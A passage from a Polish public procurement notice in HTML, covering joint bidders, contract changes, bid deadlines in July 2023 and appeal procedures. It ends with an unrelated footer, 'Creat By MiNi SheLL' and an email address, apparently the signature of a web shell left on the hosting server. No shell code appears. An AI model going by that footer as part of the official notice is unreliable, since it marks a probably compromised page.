w pkt. VIII.1. SWZ składa z ofertą każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający będzie żądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 455 ustawy Pzp oraz postanowień Projektu Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy do dnia 21-07-2023 r. do godz.10:00.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-21 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający nie dopuszcza składania ofert wariantowych.<br/>2. Zamawiający nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy PZP.<br/>3. Zamawiający nie wymaga przeprowadzenia przez Wykonawcę wizji lokalnej lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u Zamawiającego, o których mowa w art. 131 ust. 2 ustawy PZP.<br/>4. Zamawiający nie przewiduje rozliczenia między Zamawiającym a Wykonawcą w walutach obcych.<br/>5. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>6. Zamawiający nie wymaga obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań zgodnie z art. 60 i art. 121 ustawy PZP.<br/>7. Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>8. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.<br/>9. Zamawiający nie stawia wymogu lub możliwości złożenia ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy PZP.<br/>10. Zamawiający nie przewiduje wymagań wskazanych w art. 96 ust. 2 pkt 2 ustawy PZP.<br/>11. Zamawiający przewiduje wymagania wskazane w art. 95 ust. 1 w zakresie<br/>zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności, o których mowa w pkt. XXV.1. SWZ w zakresie realizacji zamówienia.<br/>12. Zamawiający zastrzega możliwość unieważnienia postępowania o udzielenie<br/>zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.Środki ochrony prawnej przewidziane są w dziale IX ustawy PZP.<br/>2. Środkami ochrony prawnej są odwołanie i skarga do sądu.<br/>3. Środki ochrony prawnej przysługują wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów ustawy. Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie zamówienia oraz dokumentów zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 469 pkt 15 ustawy Pzp oraz Rzecznikowi Małych i Średnich Przedsiębiorców.<br/>4. Odwołanie przysługuje na:<br/>1) niezgodną z przepisami ustawy czynność zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, w tym na projektowane stanowienie<br/>umowy; 2) zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której zamawiający był obowiązany na podstawie ustawy; 3) zaniechanie przeprowadzenia postępowania o udzielenie zamówienia lub zorganizowania konkursu na podstawie ustawy, mimo że zamawiający był do tego bowiązany.<br/>5. Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej. Odwołujący przekazuje zamawiającemu odwołanie wniesione w formie elektronicznej albo postaci elektronicznej albo kopię tego odwołania, jeżeli zostało ono wniesione w formie pisemnej, przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu.etc...

Creat By MiNi SheLL
Email: jattceo@gmail.com